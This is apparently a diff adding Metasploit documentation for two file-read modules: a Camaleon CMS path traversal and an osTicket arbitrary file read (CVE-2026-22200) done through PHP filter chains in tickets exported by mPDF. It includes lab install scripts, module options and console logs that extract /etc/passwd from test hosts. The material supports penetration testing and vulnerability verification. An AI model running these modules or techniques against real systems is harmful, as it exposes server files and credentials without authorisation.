+- PostgreSQL, MySQL 5+ or SQlite
+- Ruby 3.0+
+- Imagemagick
+
+### Install Ruby
+
+guides.rubyonrails.org/install_ruby_on_rails.html
+
+~~~bash
+sudo apt install build-essential rustc libssl-dev libyaml-dev zlib1g-dev libgmp-dev git curl
+~~~
+
+### Install Mise
+
+~~~bash
+curl https://mise.run | sh
+echo "eval \"\$(~/.local/bin/mise activate)\"" >> ~/.bashrc
+source ~/.bashrc
+~~~
+
+### Install Ruby with Mise
+
+~~~bash
+$ mise use -g ruby@3.0
+
+$ ruby --version
+ruby 3.0.7p220 ...
+~~~
+
+### Install Imagemagick
+
+~~~bash
+sudo apt install --no-install-recommends imagemagick
+~~~
+
+### Install Postgresql
+
+~~~bash
+sudo apt install postgresql
+~~~
+
+### Install Rails
+
+~~~bash
+$ gem install rails -v 6.1
+~~~
+
+#### concurrent-ruby Issue
+
+Downgrade concurrent-ruby to 1.3.4
+
+~~~bash
+$ gem list concurrent-ruby
+concurrent-ruby (1.3.6)
+
+$ gem install concurrent-ruby -v 1.3.4
+$ gem uninstall concurrent-ruby -v 1.3.6
+
+$ rails --version
+Rails 6.1.7.10
+~~~
+
+### Create Rails Project
+
+Run `rails new camaleon_project`
+
+### Gemfile
+
+In your Gemfile do the following:
+
+Replace `gem 'spring'` with `gem 'spring', '4.2.1'`
+
+
+Delete this line to prevent [conflict](https://github.com/owen2345/camaleon-cms/issues/1111): `gem 'sass-rails', '>= 6'`
+
+Put these lines at the bottom of your Gemfile:
+
+~~~
+gem 'camaleon_cms', '2.8.0'
+gem 'concurrent-ruby', '1.3.4'
+~~~
+
+### Install Bundle
+
+From the project directory run `bundle install`
+
+### Webpacker.yml Issue
+
+~~~bash
+wget -O camaleon_project/config/webpacker.yml https://raw.githubusercontent.com/rails/webpacker/master/lib/install/config/webpacker.yml
+~~~
+
+### Camaleon CMS Installation
+
+~~~bash
+rails generate camaleon_cms:install
+rake camaleon_cms:generate_migrations
+rake db:migrate
+~~~
+
+### Run Rails
+
+~~~bash
+bundle exec rails server -b 0.0.0.0
+~~~
+
+Navigate to `http://{ip address}:3000` and enter test under the Name field.
+
+### Setup Server
+
+When prompted with the new installation page just enter "test" into the Name field and continue.
+
+#### Create Unprivileged User (Optional)
+
+Navigate to `http://{ip address}:3000/admin` - login with the default admin credentials "admin:admin123"
+
+Then navigate to "Users -> + Add User" and fill out the form.
+
+## Verification Steps
+
+1. Do: `use auxiliary/gather/camaleon_download_private_file`
+2. Do: `set RHOST [IP]`
+3. Do: `run`
+
+## Options
+
+### FILEPATH
+
+The filepath of the file to read.
+
+### DEPTH
+
+The number of "../" appended to the filename. Default is 13
+
+## Scenarios
+
+```
+msf > use auxiliary/gather/camaleon_download_private_file 
+msf auxiliary(gather/camaleon_download_private_file) > set rhost 10.0.0.45
+rhost => 10.0.0.45
+msf auxiliary(gather/camaleon_download_private_file) > set rport 3000
+rport => 3000
+msf auxiliary(gather/camaleon_download_private_file) > set ssl false
+ssl => false
+msf auxiliary(gather/camaleon_download_private_file) > run
+[*] Running module against 10.0.0.45
+[+] /etc/passwd stored as '/home/kali/.msf4/loot/20260411192711_default_10.0.0.45_camaleon.travers_926890.txt'
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
+systemd-timesync:x:996:996:systemd Time Synchronization:/:/usr/sbin/nologin
+dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false
+messagebus:x:101:101::/nonexistent:/usr/sbin/nologin
+syslog:x:102:102::/nonexistent:/usr/sbin/nologin
+systemd-resolve:x:991:991:systemd Resolver:/:/usr/sbin/nologin
+uuidd:x:103:103::/run/uuidd:/usr/sbin/nologin
+usbmux:x:104:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+tss:x:105:105:TPM software stack,,,:/var/lib/tpm:/bin/false
+systemd-oom:x:990:990:systemd Userspace OOM Killer:/:/usr/sbin/nologin
+kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
+whoopsie:x:107:109::/nonexistent:/bin/false
+dnsmasq:x:999:65534:dnsmasq:/var/lib/misc:/usr/sbin/nologin
+avahi:x:108:111:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
+tcpdump:x:109:112::/nonexistent:/usr/sbin/nologin
+sssd:x:110:113:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
+speech-dispatcher:x:111:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
+cups-pk-helper:x:112:114:user for cups-pk-helper service,,,:/nonexistent:/usr/sbin/nologin
+fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
+saned:x:113:116::/var/lib/saned:/usr/sbin/nologin
+geoclue:x:114:117::/var/lib/geoclue:/usr/sbin/nologin
+cups-browsed:x:115:114::/nonexistent:/usr/sbin/nologin
+hplip:x:116:7:HPLIP system user,,,:/run/hplip:/bin/false
+gnome-remote-desktop:x:988:988:GNOME Remote Desktop:/var/lib/gnome-remote-desktop:/usr/sbin/nologin
+polkitd:x:987:987:User for polkitd:/:/usr/sbin/nologin
+rtkit:x:117:119:RealtimeKit,,,:/proc:/usr/sbin/nologin
+colord:x:118:120:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
+gnome-initial-setup:x:119:65534::/run/gnome-initial-setup/:/bin/false
+gdm:x:120:121:Gnome Display Manager:/var/lib/gdm3:/bin/false
+nm-openvpn:x:121:122:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
+bittman:x:1000:1000:bittman:/home/bittman:/bin/bash
+postgres:x:122:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
+
+[*] Auxiliary module execution completed
+```

documentation/modules/auxiliary/gather/osticket_arbitrary_file_read.md

@@ -0,0 +1,1030 @@
+## Vulnerable Application
+
+Enhancesoft osTicket is a widely-used open-source support ticket system.
+This module exploits an arbitrary file read vulnerability (CVE-2026-22200), which affects Enhancesoft osTicket versions 1.18.x prior to 1.18.3 and 1.17.x prior to 1.17.7. In vulnerable deployments, this issue can often be triggered by unauthenticated or guest users when ticket self-service is enabled; however, the Metasploit module itself currently uses an authenticated workflow and requires valid osTicket credentials.
+​
+This vulnerability arises due to improper sanitization of PHP filter expressions within rich-text HTML ticket submissions before they are processed by the mPDF PDF generator during export.
+
+To exploit this vulnerability, an attacker submits a ticket containing malicious payload syntax (such as `php://` or `phar://` bypasses like `php:\\` or `./php://`). When the ticket is subsequently exported to PDF, the mPDF library reads the targeted local file and embeds its contents within the generated PDF as a bitmap image. This allows remote attackers to disclose sensitive local files, such as `/etc/passwd` or `include/ost-config.php`, in the context of the osTicket web application user.
+
+In real-world deployments, this issue may be exploitable in default configurations where guests may create tickets and access ticket status, or where self-registration is enabled. The provided Metasploit module, however, models an authenticated scenario and assumes you have working staff or admin credentials with permission to create and export tickets to PDF
+
+## Installation
+
+### Using any Ubuntu VM (Recommended Way)
+
+1. OsTicket can be installed with the given script on any Ubuntu VM:
+
+```bash
+#!/bin/bash
+
+set -e  # Exit on error
+
+# Colors for verbose output
+GREEN='\033[0;32m'
+BLUE='\033[0;34m'
+RED='\033[0;31m'
+NC='\033[0m' # No Color
+
+log() {
+    echo -e "${BLUE}[+] $1${NC}"
+}
+
+success() {
+    echo -e "${GREEN}[OK] $1${NC}"
+}
+
+error() {
+    echo -e "${RED}[ERROR] $1${NC}"
+    exit 1
+}
+
+DB_NAME="osticket_db"
+DB_USER="osticket_user"
+DB_PASS="P@ssw0rd123!"  # Change this if needed
+INSTALL_DIR="/var/www/html/osticket"
+OSTICKET_VER="v1.18.1"
+
+DOWNLOAD_URL="https://github.com/osTicket/osTicket/releases/download/${OSTICKET_VER}/osTicket-${OSTICKET_VER}.zip"
+
+
+if [ "$EUID" -ne 0 ]; then 
+    error "Please run as root (sudo ./setup_osticket_cve_env.sh)"
+fi
+
+
+log "Updating system packages..."
+apt-get update -q
+
+log "Installing dependencies (software-properties-common, git, unzip, curl)..."
+apt-get install -y software-properties-common git unzip curl
+
+
+log "Adding ondrej/php repository to ensure PHP 8.2 availability..."
+add-apt-repository -y ppa:ondrej/php
+apt-get update -q
+
+
+log "Installing Apache, MariaDB, and PHP 8.2 extensions..."
+
+apt-get install -y \
+    apache2 \
+    mariadb-server \
+    php8.2 \
+    php8.2-mysql \
+    php8.2-mbstring \
+    php8.2-gd \
+    php8.2-intl \
+    php8.2-apcu \
+    php8.2-xml \
+    php8.2-curl \
+    php8.2-zip \
+    php8.2-imap \
+    php8.2-bcmath \
+    libapache2-mod-php8.2
+
+success "LAMP stack installed."
+
+
+log "Configuring MySQL/MariaDB..."
+service mysql start
+
+
+mysql -u root -e "CREATE DATABASE IF NOT EXISTS ${DB_NAME};"
+mysql -u root -e "CREATE USER IF NOT EXISTS '${DB_USER}'@'localhost' IDENTIFIED BY '${DB_PASS}';"
+mysql -u root -e "GRANT ALL PRIVILEGES ON ${DB_NAME}.* TO '${DB_USER}'@'localhost';"
+mysql -u root -e "FLUSH PRIVILEGES;"
+
+success "Database '${DB_NAME}' created with user '${DB_USER}'."
+
+
+log "Downloading osTicket ${OSTICKET_VER}..."
+mkdir -p /tmp/osticket_install
+wget -O /tmp/osticket_install/osticket.zip "${DOWNLOAD_URL}"
+
+if [ ! -f /tmp/osticket_install/osticket.zip ]; then
+    error "Download failed. Check internet connection or URL."
+fi
+
+log "Cleaning up old installations..."
+rm -rf ${INSTALL_DIR}
+mkdir -p ${INSTALL_DIR}
+
+log "Extracting files..."
+unzip -q /tmp/osticket_install/osticket.zip -d /tmp/osticket_install/
+
+cp -r /tmp/osticket_install/upload/* ${INSTALL_DIR}/
+
+
+log "Preparing configuration file..."
+cd ${INSTALL_DIR}/include
+if [ -f ost-sampleconfig.php ]; then
+    cp ost-sampleconfig.php ost-config.php
+else
+    error "ost-sampleconfig.php not found! Extraction might have failed."
+fi
+
+
+chmod 0666 ost-config.php
+
+
+log "Configuring Apache Virtual Host..."
+
+CONF_FILE="/etc/apache2/sites-available/osticket.conf"
+
+cat > ${CONF_FILE} <<EOF
+<VirtualHost *:80>
+    ServerAdmin admin@localhost
+    DocumentRoot ${INSTALL_DIR}
+
+    <Directory ${INSTALL_DIR}>
+        Options Indexes FollowSymLinks MultiViews
+        AllowOverride All
+        Require all granted
+    </Directory>
+
+    ErrorLog \${APACHE_LOG_DIR}/error.log
+    CustomLog \${APACHE_LOG_DIR}/access.log combined
+</VirtualHost>
+EOF
+
+
+a2dissite 000-default.conf
+a2ensite osticket.conf
+a2enmod rewrite
+
+
+chown -R www-data:www-data ${INSTALL_DIR}
+chmod -R 755 ${INSTALL_DIR}
+
+chmod 0666 ${INSTALL_DIR}/include/ost-config.php
+
+log "Restarting Apache..."
+service apache2 restart
+
+
+rm -rf /tmp/osticket_install
+
+
+IP_ADDR=$(hostname -I | cut -d' ' -f1)
+
+echo "================================================================="
+echo -e "${GREEN} INSTALLATION COMPLETE ${NC}"
+echo "================================================================="
+echo -e "Target: osTicket ${OSTICKET_VER} (Vulnerable to CVE-2026-22200)"
+echo -e "Access the setup wizard at: ${BLUE}http://${IP_ADDR}/setup/${NC}"
+echo "-----------------------------------------------------------------"
+echo "Database Details for the Wizard:"
+echo -e "MySQL Database: ${BLUE}${DB_NAME}${NC}"
+echo -e "MySQL Username: ${BLUE}${DB_USER}${NC}"
+echo -e "MySQL Password: ${BLUE}${DB_PASS}${NC}"
+echo "-----------------------------------------------------------------"
+echo "Setup Instructions:"
+echo "1. Open the URL above in your browser."
+echo "2. Ensure all prerequisites show a green checkmark."
+echo "3. Fill in the 'System Settings' (use any admin info)."
+echo "4. Fill in the 'Database Settings' using the credentials above."
+echo "5. Click 'Install Now'."
+echo "================================================================="
+```
+
+2. After installation and creation of the database, one final step is required to complete osTicket installation and that must be done through the browser. Navigate to your osTicket URL (e.g., `http://localhost/support`) to access the "Basic Installation" screen. You will need to fill out three main sections to finalize the setup:
+
+   **System Settings**
+   This section defines the basic identity of your helpdesk:
+   - **Helpdesk Name:** The title of your support site (e.g., "IT Support" or "Customer Helpdesk").
+   - **Default Email:** The primary email address from which the system will send outgoing notifications.
+
+   **Admin User**
+   This section creates the master administrator account for the osTicket backend:
+   - **First Name & Last Name:** The administrator's real name.
+   - **Email Address:** The administrator's email address (used for password resets and system alerts). Must be different from **Default Email** mentioned above.
+   - **Username:** The login username for the admin panel.
+   - **Password & Retype Password:** The password for the admin account.
+
+   **Database Settings**
+   This section connects the application to your pre-configured MySQL/MariaDB database:
+   - **MySQL Table Prefix:** Typically left as the default `ost_` unless you are sharing the database with other applications.
+   - **MySQL Hostname:** The address of your database server (usually `localhost` or `127.0.0.1` if hosted on the same machine).
+   - **MySQL Database:** The name of the blank database you created prior to running the installer (e.g., `osticket_db`).
+   - **MySQL Username:** The database user with privileges to read, write, and modify the database (e.g., `osticket_user` or a dedicated user).
+   - **MySQL Password:** The password for the MySQL user. We are using `P@ssw0rd123!` in the above script.
+
+   Once these fields are filled out, click **"Install Now"** to populate the database and complete the installation. *(Note: Ensure that the `include/ost-sampleconfig.php` file has been copied, renamed to `include/ost-config.php`, and has write permissions enabled before clicking install)*.
+
+3. After installation is completed. Sign up and create a user. This user will need to verify itself using a magic link. Since we are not setting up any mail server, we have to login with the administrator user, reset their password from `/scp/users.php` to activate the user account.
+
+4. Create a new ticket and note down the ticket number (It will have a number like: `#527686`)
+
+
+### Using Docker
+
+OsTicket does not ship their official docker so have a monolithic setup is the best way to install it. 
+
+1. Use the following Dockerfile to setup:
+
+```Dockerfile
+FROM ubuntu:22.04
+
+ENV DEBIAN_FRONTEND=noninteractive
+
+ENV DB_NAME="osticket_db" \
+    DB_USER="osticket_user" \
+    DB_PASS="P@ssw0rd123!" \
+    INSTALL_DIR="/var/www/html/osticket" \
+    OSTICKET_VER="v1.18.1"
+
+RUN apt-get update -q && apt-get install -y \
+    software-properties-common \
+    git \
+    unzip \
+    curl \
+    wget \
+    nano \
+    && rm -rf /var/lib/apt/lists/*
+
+RUN add-apt-repository -y ppa:ondrej/php && apt-get update -q
+
+RUN apt-get install -y \
+    apache2 \
+    mariadb-server \
+    php8.2 \
+    php8.2-mysql \
+    php8.2-mbstring \
+    php8.2-gd \
+    php8.2-intl \
+    php8.2-apcu \
+    php8.2-xml \
+    php8.2-curl \
+    php8.2-zip \
+    php8.2-imap \
+    php8.2-bcmath \
+    libapache2-mod-php8.2 \
+    && rm -rf /var/lib/apt/lists/*
+
+RUN service mariadb start && \
+    sleep 3 && \
+    mysql -u root -e "CREATE DATABASE IF NOT EXISTS ${DB_NAME};" && \
+    mysql -u root -e "CREATE USER IF NOT EXISTS '${DB_USER}'@'localhost' IDENTIFIED BY '${DB_PASS}';" && \
+    mysql -u root -e "GRANT ALL PRIVILEGES ON ${DB_NAME}.* TO '${DB_USER}'@'localhost';" && \
+    mysql -u root -e "FLUSH PRIVILEGES;"
+
+
+RUN mkdir -p /tmp/osticket_install && \
+    wget -O /tmp/osticket_install/osticket.zip "https://github.com/osTicket/osTicket/releases/download/${OSTICKET_VER}/osTicket-${OSTICKET_VER}.zip" && \
+    rm -rf ${INSTALL_DIR} && \
+    mkdir -p ${INSTALL_DIR} && \
+    unzip -q /tmp/osticket_install/osticket.zip -d /tmp/osticket_install/ && \
+    cp -r /tmp/osticket_install/upload/* ${INSTALL_DIR}/
+
+RUN cp ${INSTALL_DIR}/include/ost-sampleconfig.php ${INSTALL_DIR}/include/ost-config.php
+
+RUN sed -i "s/error_reporting(E_ALL & ~E_NOTICE);/error_reporting(E_ALL \& ~E_NOTICE \& ~E_DEPRECATED \& ~E_WARNING);/" ${INSTALL_DIR}/bootstrap.php
+
+RUN echo "<VirtualHost *:80>\n\
+    ServerAdmin admin@localhost\n\
+    DocumentRoot ${INSTALL_DIR}\n\
+    <Directory ${INSTALL_DIR}>\n\
+        Options Indexes FollowSymLinks MultiViews\n\
+        AllowOverride All\n\
+        Require all granted\n\
+    </Directory>\n\
+    ErrorLog \${APACHE_LOG_DIR}/error.log\n\
+    CustomLog \${APACHE_LOG_DIR}/access.log combined\n\
+</VirtualHost>" > /etc/apache2/sites-available/osticket.conf
+
+RUN a2dissite 000-default.conf && \
+    a2ensite osticket.conf && \
+    a2enmod rewrite && \
+    chown -R www-data:www-data ${INSTALL_DIR} && \
+    chmod -R 755 ${INSTALL_DIR} && \
+    chmod 0666 ${INSTALL_DIR}/include/ost-config.php
+
+RUN rm -rf /tmp/osticket_install
+
+RUN echo '#!/bin/bash\n\
+# Start MariaDB service\n\
+service mariadb start\n\
+# Wait for DB to be fully ready\n\
+sleep 2\n\
+# Start Apache in the foreground to keep the container alive\n\
+source /etc/apache2/envvars\n\
+exec apache2 -D FOREGROUND\n\
+' > /usr/local/bin/entrypoint.sh && chmod +x /usr/local/bin/entrypoint.sh
+
+EXPOSE 80
+
+CMD ["/usr/local/bin/entrypoint.sh"]
+```
+
+2. Build and run with the following commands:
+```bash
+docker build -t osticket-cve-env .
+docker run -d -p 8080:80 --name osticket_vuln_server osticket-cve-env
+```
+
+2. After installation and creation of the database, one final step is required to complete osTicket installation and that must be done through the browser. Navigate to your osTicket URL (e.g., `http://localhost:8080/support`) to access the "Basic Installation" screen. You will need to fill out three main sections to finalize the setup:
+
+   **System Settings**
+   This section defines the basic identity of your helpdesk:
+   - **Helpdesk Name:** The title of your support site (e.g., "IT Support" or "Customer Helpdesk").
+   - **Default Email:** The primary email address from which the system will send outgoing notifications.
+
+   **Admin User**
+   This section creates the master administrator account for the osTicket backend:
+   - **First Name & Last Name:** The administrator's real name.
+   - **Email Address:** The administrator's email address (used for password resets and system alerts). Must be different from **Default Email** mentioned above.
+   - **Username:** The login username for the admin panel.
+   - **Password & Retype Password:** The password for the admin account.
+
+   **Database Settings**
+   This section connects the application to your pre-configured MySQL/MariaDB database:
+   - **MySQL Table Prefix:** Typically left as the default `ost_` unless you are sharing the database with other applications.
+   - **MySQL Hostname:** The address of your database server (usually `localhost` or `127.0.0.1` if hosted on the same machine).
+   - **MySQL Database:** The name of the blank database you created prior to running the installer (e.g., `osticket_db`).
+   - **MySQL Username:** The database user with privileges to read, write, and modify the database (e.g., `osticket_user` or a dedicated user).
+   - **MySQL Password:** The password for the MySQL user. We are using `P@ssw0rd123!` in the above script.
+
+   Once these fields are filled out, click **"Install Now"** to populate the database and complete the installation. *(Note: Ensure that the `include/ost-sampleconfig.php` file has been copied, renamed to `include/ost-config.php`, and has write permissions enabled before clicking install)*.
+
+3. After installation is completed. Sign up and create a user. This user will need to verify itself using a magic link. Since we are not setting up any mail server, we have to login with the administrator user, reset their password from `/scp/users.php` to activate the user account.
+
+4. Create a new ticket and note down the ticket number (It will have a number like: `#527686`)
+
+## Verification Steps
+1. Install OsTicket using either of the steps mentioned above.
+2. Start `msfconsole`.
+3. Do: `use auxiliary/gather/osticket_arbitrary_file_read`
+4. Set the `RHOSTS` and `RPORT` options as necessary
+5. Set the `TICKET_NUMBER` with the ticket number gathered from the website. If not set
+6. Set the `USERNAME` and `PASSWORD` from the registered user.
+7. Set the full file name that you want to fetch in the `FILE`.
+8. Do: `run`
+
+## Options
+
+### FILE
+The absolute file path of the target file to be retrieved from the osTicket server. By default, this is set to `/etc/passwd`.
+
+### LOGIN_PORTAL
+Specifies which osTicket portal to use for authentication. osTicket maintains separate login interfaces for staff/agents (`scp`) and end-users (`client`). Setting this to auto allows the module to automatically determine the correct portal based on the authentication flow or provided credentials.
+
+### MAX_REDIRECTS
+The maximum number of HTTP redirects the module will follow while navigating the authentication process and executing the payload. The default is `3`.
+
+### MAX_TICKET_ID
+Specifies the upper limit when brute-forcing the internal database ID of a ticket. Since the internal database ID is often required for exploitation but isn't always publicly visible, the module will attempt to brute-force it up to this boundary if `TICKET_ID` is not explicitly provided. The default is `20`.
+
+### TICKET_NUMBER
+The public-facing, user-visible ticket number (e.g., `978554`) that the module will target to inject the payload and trigger the vulnerability.
+
+## Scenarios
+
+### With new non-administrator user
+```
+msf auxiliary(gather/osticket_arbitrary_file_read) > set USERNAME test
+USERNAME => test
+msf auxiliary(gather/osticket_arbitrary_file_read) > set TICKET_NUMBER 527686
+TICKET_NUMBER => 527686
+msf auxiliary(gather/osticket_arbitrary_file_read) > set VERBOSE true
+VERBOSE => true
+msf auxiliary(gather/osticket_arbitrary_file_read) > set RHOSTS http://localhost:8080/
+RHOSTS => http://localhost:8080/
+msf auxiliary(gather/osticket_arbitrary_file_read) > set PASSWORD administrator
+PASSWORD => administrator
+msf auxiliary(gather/osticket_arbitrary_file_read) > run
+[*] Running module against 127.0.0.1
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] is_osticket?: Response code=200, body length=4943
+[*] is_osticket?: osTicket signature FOUND in response body
+[!] The service is running, but could not be validated. Target appears to be an osTicket installation
+[*] Target: 127.0.0.1:8080
+[*] File to extract: /etc/passwd
+[*] Attempting authentication...
+[*] do_login: portal preference=auto, base_uri=/, username=test
+[*] do_login: Trying staff panel (/scp/) login...
+[*] osticket_login_scp: GET /scp/login.php
+[*] osticket_login_scp: GET response code=200, cookies=OSTSESSID=hni5kfvm5hin0dpkvc7suh70dm;
+[*] extract_csrf_token: Searching HTML (6504 bytes) for __CSRFToken__
+[+] extract_csrf_token: Found token=dc50fdaa52a6f0aefa0adb14af2698ad89c95501
+[*] osticket_login_scp: POST /scp/login.php with userid=test
+[*] osticket_login_scp: POST response code=200, url=, body contains userid=true
+[-] osticket_login_scp: Login FAILED (still see login form)
+[*] do_login: Staff panel login failed
+[*] do_login: Trying client portal login...
+[*] osticket_login_client: GET /login.php
+[*] osticket_login_client: GET response code=200, cookies=OSTSESSID=qpo6iptqv75f1cqcderpha1v86;
+[*] extract_csrf_token: Searching HTML (5213 bytes) for __CSRFToken__
+[+] extract_csrf_token: Found token=111e06bd5a313466a4f550f9d8014ebb8ba90e8e
+[*] osticket_login_client: POST /login.php with luser=test
+[*] osticket_login_client: POST response code=302, body contains luser=false
+[+] osticket_login_client: Login SUCCESS
+[+] do_login: Client portal login succeeded, cookies=OSTSESSID=qpo6iptqv75f1cqcderpha1v86;
+[+] Authenticated via client portal
+[*] Locating ticket...
+[*] find_ticket_id: GET /tickets.php (looking for ticket #527686)
+[*] find_ticket_id: Using cookies=OSTSESSID=qpo6iptqv75f1cqcderpha1v86;
+[*] find_ticket_id: Ticket listing response code=200, body=6856 bytes
+[*] find_ticket_id: Body Length:
+6856
+[+] find_ticket_id: Found ticket ID=2 from listing page
+[+] Ticket #527686 has internal ID: 2
+[*] Generating PHP filter chain payload...
+[*] Payload generated (13646 bytes)
+[*] Submitting payload as ticket reply...
+[*] submit_ticket_reply: GET /tickets.php?id=2 to fetch CSRF token
+[*] submit_ticket_reply: GET response code=200, body=9605 bytes
+[*] extract_csrf_token: Searching HTML (9605 bytes) for __CSRFToken__
+[+] extract_csrf_token: Found token=f9ae5cdbe887f403e26489ec4fbb2d1d27234797
+[*] submit_ticket_reply: Using textarea field 'c89d7750ba2621', payload=13646 bytes
+[*] submit_ticket_reply: POST /tickets.php with a=reply, id=2
+[*] submit_ticket_reply: POST response code=200, body=24114 bytes
+[*] submit_ticket_reply: Success indicators found=true
+[+] Reply posted successfully
+[*] Downloading ticket PDF...
+[*] download_ticket_pdf: Trying PDF export from /tickets.php
+[*] download_ticket_pdf: GET /tickets.php?a=print&id=2
+[*] download_ticket_pdf: Response code=200, Content-Type=application/pdf, magic="%PDF", size=54270
+[+] download_ticket_pdf: Got PDF (54270 bytes)
+[+] PDF downloaded (54270 bytes)
+[*] Extracting file from PDF...
+[*] extract_files_from_pdf: Processing PDF (54270 bytes)
+[*] extract_pdf_image_streams: Found image object (139060 bytes decompressed)
+[*] extract_pdf_image_streams: Found image object (1239 bytes decompressed)
+[*] extract_files_from_pdf: Found 2 image XObject streams
+[*] extract_files_from_pdf: Image #0: 139060 bytes, swapped to BGR
+[*] extract_files_from_pdf: Image #1: 1239 bytes, swapped to BGR
+[*] extract_data_from_bmp_stream: ISO-2022-KR marker found at offset 0 in 1239-byte stream
+[*] extract_data_from_bmp_stream: 1235 bytes after marker (nulls stripped)
+[*] First 96 bytes of data after marker and null-strip:
+[*]   ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
+[*]   hex:   72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
+[*] Data looks like base64? false
+[*] Treating as plain (non-base64) - preview:
+[*]   ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
+[*]   hex:   72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
+[+] extract_files_from_pdf: Image #1 yielded 1235 bytes of extracted data
+[*] extract_files_from_pdf: Fallback - scanning 12 raw streams
+[*] extract_files_from_pdf: Total extracted files: 1
+[+] Extracted 1235 bytes
+
+======================================================================
+EXTRACTED FILE CONTENTS
+======================================================================
+
+--- [/etc/passwd] (1235 bytes) ---
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+mysql:
+[+] Saved to: /home/tintin/.msf4/loot/20260222194304_default_127.0.0.1_osticket.etc_pas_543896.bin
+
+[+] Exploitation complete
+[*] Running module against ::1
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] is_osticket?: Response code=200, body length=4943
+[*] is_osticket?: osTicket signature FOUND in response body
+[!] The service is running, but could not be validated. Target appears to be an osTicket installation
+[*] Target: ::1:8080
+[*] File to extract: /etc/passwd
+[*] Attempting authentication...
+[*] do_login: portal preference=auto, base_uri=/, username=test
+[*] do_login: Trying staff panel (/scp/) login...
+[*] osticket_login_scp: GET /scp/login.php
+[*] osticket_login_scp: GET response code=200, cookies=OSTSESSID=s0ksargvidhkv41th0url3m1ua;
+[*] extract_csrf_token: Searching HTML (6504 bytes) for __CSRFToken__
+[+] extract_csrf_token: Found token=e1a5096cc2f00526a4606567f866ad8fdcf67d22
+[*] osticket_login_scp: POST /scp/login.php with userid=test
+[*] osticket_login_scp: POST response code=200, url=, body contains userid=true
+[-] osticket_login_scp: Login FAILED (still see login form)
+[*] do_login: Staff panel login failed
+[*] do_login: Trying client portal login...
